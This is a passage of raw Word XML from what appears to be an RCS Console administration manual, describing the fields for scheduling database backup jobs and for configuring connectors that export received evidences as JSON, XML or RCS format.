    <w:p w:rsidR="00F2314A" w:rsidRDefault="00F2314A" w:rsidP="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000942D6" w:rsidRPr="000942D6" w:rsidRDefault="000942D6" w:rsidP="000942D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000942D6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">RCS Console System Administrators can schedule backup jobs in order to backup selected data or the entire database. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0024621D" w:rsidRPr="000942D6" w:rsidRDefault="0024621D" w:rsidP="00F2314A">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8"/>
        <w:gridCol w:w="284"/>
        <w:gridCol w:w="4656"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB1248" w:rsidRPr="000942D6" w:rsidTr="000942D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4688" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB1248" w:rsidRPr="000942D6" w:rsidRDefault="003A4380" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1602" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:223.5pt;height:212.25pt;z-index:251889664;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId361" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1602" DrawAspect="Content" ObjectID="_1446455398" r:id="rId362"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB1248" w:rsidRPr="000942D6" w:rsidRDefault="00117549" w:rsidP="00117549">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>11.1</w:t>
            </w:r>
            <w:r w:rsidR="00DB1248" w:rsidRPr="000942D6">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> [ RCS Console ] System &gt; Backup &gt; New Backup Job</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB1248" w:rsidRPr="000942D6" w:rsidRDefault="00DB1248" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4656" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DB1248" w:rsidRPr="000942D6" w:rsidRDefault="00DB1248" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DB1248" w:rsidRPr="000942D6" w:rsidRDefault="00DB1248" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DB1248" w:rsidRPr="000942D6" w:rsidRDefault="00DB1248" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00FD4CD1" w:rsidRPr="000942D6">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="001F16B4" w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allows to specify if the backup job is active or not. If a backup job is not enabled it will not be executed.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB1248" w:rsidRPr="000942D6" w:rsidRDefault="00DB1248" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DB1248" w:rsidRPr="000942D6" w:rsidRDefault="00DB1248" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00FD4CD1" w:rsidRPr="000942D6">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>What</w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00756DF0" w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allows to select the data to include inside the backup, from: Metadata, Full, Operation or Target.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DB1248" w:rsidRPr="000942D6" w:rsidRDefault="00DB1248" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FD4CD1" w:rsidRPr="000942D6" w:rsidRDefault="00FD4CD1" w:rsidP="00FD4CD1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>When</w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00EA1EC3" w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the backup frequency, expressed in UTC time.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FD4CD1" w:rsidRPr="000942D6" w:rsidRDefault="00FD4CD1" w:rsidP="00FD4CD1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DB1248" w:rsidRPr="000942D6" w:rsidRDefault="00FD4CD1" w:rsidP="008344CF">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="008344CF" w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is </w:t>
            </w:r>
            <w:r w:rsidR="00011EBB" w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>a name to be assigned to the backup job.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0024621D" w:rsidRPr="000942D6" w:rsidRDefault="0024621D" w:rsidP="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0024621D" w:rsidRPr="000942D6" w:rsidRDefault="000942D6" w:rsidP="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The image above shows the New Backup Job window within </w:t>
      </w:r>
      <w:r w:rsidR="00334DFB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">[ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>System &gt; Backup</w:t>
      </w:r>
      <w:r w:rsidR="00FE0DFD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00334DFB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D539C3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Console </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003571D2" w:rsidRDefault="003571D2" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRDefault="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRPr="00065E46" w:rsidRDefault="00F2314A" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc372642529"/>
      <w:r w:rsidRPr="00065E46">
        <w:lastRenderedPageBreak/>
        <w:t>Connectors: Data Export for Third Party Software</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="00F2314A" w:rsidRDefault="00F2314A" w:rsidP="00F2314A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE0DFD" w:rsidRDefault="009E4B6A" w:rsidP="00FE0DFD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Connectors section allows to create connections rules with third party software. The evidences received by RCS will be sorted according to the rules implemented here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B6A" w:rsidRDefault="009E4B6A" w:rsidP="00FE0DFD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E4B6A" w:rsidRPr="000942D6" w:rsidRDefault="009E4B6A" w:rsidP="00FE0DFD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Connectors usage requires a specific product license permission and it’s enabled only if the client received Connectors management authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="00FE0DFD" w:rsidP="00FE0DFD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabel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8"/>
        <w:gridCol w:w="284"/>
        <w:gridCol w:w="4656"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidTr="00A05E51">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4688" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="003A4380" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1501" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:223.5pt;height:182.25pt;z-index:251870208;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId363" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1501" DrawAspect="Content" ObjectID="_1446455399" r:id="rId364"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="00117549" w:rsidP="00117549">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>11.2</w:t>
            </w:r>
            <w:r w:rsidR="00FE0DFD" w:rsidRPr="000942D6">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> [ RCS Console ] System &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00FE0DFD">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Connectors</w:t>
            </w:r>
            <w:r w:rsidR="00FE0DFD" w:rsidRPr="000942D6">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; New </w:t>
            </w:r>
            <w:r w:rsidR="00FE0DFD">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Connector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="00FE0DFD" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4656" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="00FE0DFD" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="00FE0DFD" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="00FE0DFD" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows to specify if the </w:t>
            </w:r>
            <w:r w:rsidR="00C37A55">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>connector</w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is active or not. If a </w:t>
            </w:r>
            <w:r w:rsidR="00C37A55">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>connector</w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is not enabled it will not be executed.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="00FE0DFD" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C37A55" w:rsidRDefault="00C37A55" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a name to be assigned to the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>connector</w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C37A55" w:rsidRPr="000942D6" w:rsidRDefault="00C37A55" w:rsidP="00C37A55">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="00FE0DFD" w:rsidP="00C37A55">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00C37A55">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Path</w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="009E4B6A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is the name of the Operation, Target or Agent to be </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="00FE0DFD" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="00FE0DFD" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00C37A55">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="009E4B6A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the type of evidences export (Local or Remote).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FE0DFD" w:rsidRPr="000942D6" w:rsidRDefault="00FE0DFD" w:rsidP="00A05E51">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FE0DFD" w:rsidRDefault="00FE0DFD" w:rsidP="00C37A55">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00C37A55">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Format</w:t>
            </w:r>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="009E4B6A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the evidences export format (JSON or XML for Local type and RCS for Remote type).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C37A55" w:rsidRPr="000942D6" w:rsidRDefault="00C37A55" w:rsidP="00C37A55">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C37A55" w:rsidRDefault="00C37A55" w:rsidP="00C37A55">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Keep the evidence</w:t>
            </w:r>
            <w:r w:rsidR="009E4B6A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] if selected, a copy of the exported evidences will be kept in RCS database.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C37A55" w:rsidRPr="000942D6" w:rsidRDefault="00C37A55" w:rsidP="00C37A55">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C37A55" w:rsidRDefault="00C37A55" w:rsidP="00C37A55">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000942D6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
